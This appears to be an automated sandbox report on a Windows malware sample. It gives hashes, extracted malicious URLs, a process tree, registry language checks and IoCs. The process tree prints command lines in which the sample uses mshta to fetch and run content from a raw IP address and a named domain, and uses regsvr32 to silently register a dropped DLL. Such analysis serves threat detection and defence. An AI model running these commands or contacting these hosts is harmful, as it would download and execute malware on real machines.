Analysis
-
max time kernel
141s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-11-2024 05:14
Behavioral task
behavioral1
Sample
ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe
Resource
win7-20240903-en
General
-
Target
ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe
-
Size
31KB
-
MD5
ab30aae35c2c14af366a5647ca1e53e1
-
SHA1
8d30e8b000e09763e18c3b330a91cccd5e5770da
-
SHA256
ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c
-
SHA512
b01ea5f06121288b966ecd5e84d146ab3dddd1a23a2b3ea135607a69b2c9c309a6d8833664ab231247415adf1b7b9edb91337e12f9a508b52914c48ce323cb94
-
SSDEEP
768:sYzkFZqKKeZOyYMY1J4UWPknF0KaHw2PQUbj3m1hv9:YFIeZRYMIJSPkF0KaHFQ8shF
Malware Config
Extracted
http://95.211.27.154/install.php?id=02944
Extracted
http://urodinam.net/8732489273.php
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 1560 mshta.exe 6 2672 mshta.exe 10 2672 mshta.exe 12 2672 mshta.exe 19 1560 mshta.exe -
Executes dropped EXE 2 IoCs
pid Process 2772 dll.exe 1948 32.exe -
Loads dropped DLL 4 IoCs
pid Process 2624 cmd.exe 2624 cmd.exe 2624 cmd.exe 2624 cmd.exe -
resource yara_rule behavioral1/memory/1624-0-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/1624-19-0x0000000000400000-0x0000000000419000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\ C:\Users\Admin\AppData\Local\Temp\hlp.dll dll.exe File created C:\Users\Admin\AppData\Local\Temp\ C:\Users\Admin\AppData\Local\Temp\temp.exe 32.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1624 wrote to memory of 1560 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 29 PID 1624 wrote to memory of 1560 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 29 PID 1624 wrote to memory of 1560 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 29 PID 1624 wrote to memory of 1560 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 29 PID 1624 wrote to memory of 2672 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 1624 wrote to memory of 2672 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 1624 wrote to memory of 2672 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 1624 wrote to memory of 2672 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 1624 wrote to memory of 2624 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 1624 wrote to memory of 2624 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 1624 wrote to memory of 2624 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 1624 wrote to memory of 2624 1624 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 2624 wrote to memory of 2772 2624 cmd.exe 33 PID 2624 wrote to memory of 2772 2624 cmd.exe 33 PID 2624 wrote to memory of 2772 2624 cmd.exe 33 PID 2624 wrote to memory of 2772 2624 cmd.exe 33 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1324 2624 cmd.exe 35 PID 2624 wrote to memory of 1948 2624 cmd.exe 36 PID 2624 wrote to memory of 1948 2624 cmd.exe 36 PID 2624 wrote to memory of 1948 2624 cmd.exe 36 PID 2624 wrote to memory of 1948 2624 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe"C:\Users\Admin\AppData\Local\Temp\ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\mshta.exemshta http://95.211.27.154/install.php?id=029442⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1560
-
-
C:\Windows\SysWOW64\mshta.exemshta http://urodinam.net/8732489273.php2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2672
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\temp.bat2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\dll.exeC:\Users\Admin\AppData\Local\Temp\dll.exe C:\Users\Admin\AppData\Local\Temp\hlp.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:2772
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\hlp.dll3⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
C:\Users\Admin\AppData\Local\Temp\32.exeC:\Users\Admin\AppData\Local\Temp\32.exe C:\Users\Admin\AppData\Local\Temp\temp.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:1948
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD567e233f1b51099732474c59d3d9c179b
SHA15585c79a211e4882096f753d79e0814f9f9bd5d7
SHA25666ea418d861239407dd5b524c6443404b2e27b45097a585b4257e79666f859e4
SHA512e54ce43b78e18b0632e4dba9e23afddbc5080fe837d31920bf51da11d8da535a84c10f65098e32e5cf27ffbf78bd9d283e88baeebd362f6855ddb0adcc83d45e
-
Filesize
3KB
MD5892eb2047d566f2e0288ecd98e150a4a
SHA1557020450be4ca2e19dec021865b4ca14fc032d6
SHA25656608e8b3bf96e9a1644c819713b6de1511002aeaa41299fe0dfd136f63ab635
SHA51200db937ff6f337ccca134575cd4e159a5112c69e1347a09295ef31120fe465c1aa41d660c1fd6064cc524b98496a6cbe32cc731cc14245bc783ca6c2ef69bbe1
-
Filesize
284B
MD523f055817c526491f40ed984f0fbdf7a
SHA16610dbcb67418435134ccf65aa7fae786cebef49
SHA256a8c56d888219ada4d7064537f9fba2c05cac10ec552758e6d02d89da5d8e67fd
SHA512d8a1abd46114026ae525c1aa45579b32980ac568450313f7911cf45b97025a244dec0b85dcbc41798145af23aef6cd312e2f556692c4338637f51fe83cf044b4